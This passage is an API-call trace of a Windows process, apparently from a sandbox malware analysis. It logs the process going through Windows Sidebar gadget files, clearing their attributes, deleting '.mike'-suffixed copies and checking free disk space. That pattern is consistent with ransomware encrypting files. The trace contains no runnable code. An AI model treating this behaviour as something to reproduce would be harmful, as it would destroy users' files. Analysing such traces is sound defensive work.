lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png", dwFileAttributes=0x80) returned 0 [0105.093] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_rest.png.mike")) returned 1 [0105.095] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png", dwFileAttributes=0x80) returned 0 [0105.100] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png.mike")) returned 1 [0105.102] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png", dwFileAttributes=0x80) returned 0 [0105.243] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png.mike")) returned 1 [0105.246] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png", dwFileAttributes=0x80) returned 0 [0105.364] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png.mike")) returned 1 [0105.366] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png", dwFileAttributes=0x80) returned 0 [0105.372] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_down.png.mike")) returned 1 [0105.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png", dwFileAttributes=0x80) returned 0 [0105.379] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png.mike")) returned 1 [0105.380] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png", dwFileAttributes=0x80) returned 0 [0105.386] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png.mike")) returned 1 [0105.388] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png", dwFileAttributes=0x80) returned 0 [0105.394] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png.mike")) returned 1 [0105.395] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.405] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png", dwFileAttributes=0x80) returned 0 [0105.405] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png.mike")) returned 1 [0105.409] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png", dwFileAttributes=0x80) returned 0 [0105.414] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png.mike")) returned 1 [0105.416] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png", dwFileAttributes=0x80) returned 0 [0105.422] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png.mike")) returned 1 [0105.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png", dwFileAttributes=0x80) returned 0 [0105.431] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png.mike")) returned 1 [0105.433] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png", dwFileAttributes=0x80) returned 0 [0105.441] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png.mike")) returned 1 [0105.443] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg", dwFileAttributes=0x80) returned 0 [0105.495] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg.mike")) returned 1 [0105.498] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.498] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.498] CoTaskMemFree (pv=0x506980) [0105.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.499] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0105.504] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png", dwFileAttributes=0x80) returned 0 [0105.504] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\bg_sidebar.png.mike")) returned 1 [0105.506] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0105.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png", dwFileAttributes=0x80) returned 0 [0105.511] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\slideshow_glass_frame.png.mike")) returned 1 [0105.512] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.512] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.512] CoTaskMemFree (pv=0x506980) [0105.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.513] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0105.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png", dwFileAttributes=0x80) returned 0 [0105.520] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\slideshow_glass_frame.png.mike")) returned 1 [0105.522] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.522] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.522] CoTaskMemFree (pv=0x506980) [0105.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.528] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0105.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0105.547] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\drag.png.mike")) returned 1 [0105.548] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0105.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0105.557] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\icon.png.mike")) returned 1 [0105.559] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0105.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0105.566] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\logo.png.mike")) returned 1 [0105.567] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.568] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.568] CoTaskMemFree (pv=0x506980) [0105.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.570] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0105.586] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml.mike")) returned 1 [0105.587] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0105.597] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html.mike")) returned 1 [0105.608] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html", dwFileAttributes=0x80) returned 0 [0105.615] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html.mike")) returned 1 [0105.616] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.616] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.616] CoTaskMemFree (pv=0x506980) [0105.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.617] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.617] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.617] CoTaskMemFree (pv=0x506980) [0105.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.617] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0105.617] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.617] CoTaskMemFree (pv=0x506980) [0105.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0105.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png", dwFileAttributes=0x80) returned 0 [0105.634] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png.mike")) returned 1 [0105.636] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png", dwFileAttributes=0x80) returned 0 [0105.641] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png.mike")) returned 1 [0105.642] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png", dwFileAttributes=0x80) returned 0 [0105.660] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png.mike")) returned 1 [0105.661] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png", dwFileAttributes=0x80) returned 0 [0105.666] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\12.png.mike")) returned 1 [0105.668] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png", dwFileAttributes=0x80) returned 0 [0105.676] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\13.png.mike")) returned 1 [0105.678] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png", dwFileAttributes=0x80) returned 0 [0105.682] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\14.png.mike")) returned 1 [0105.684] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png", dwFileAttributes=0x80) returned 0 [0105.689] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\15.png.mike")) returned 1 [0105.690] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png", dwFileAttributes=0x80) returned 0 [0105.695] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\16.png.mike")) returned 1 [0105.704] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png", dwFileAttributes=0x80) returned 0 [0105.717] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png.mike")) returned 1 [0105.718] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png", dwFileAttributes=0x80) returned 0 [0105.725] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png.mike")) returned 1 [0105.727] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png", dwFileAttributes=0x80) returned 0 [0105.732] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png.mike")) returned 1 [0105.734] GetDiskFreeSpaceExW (in: 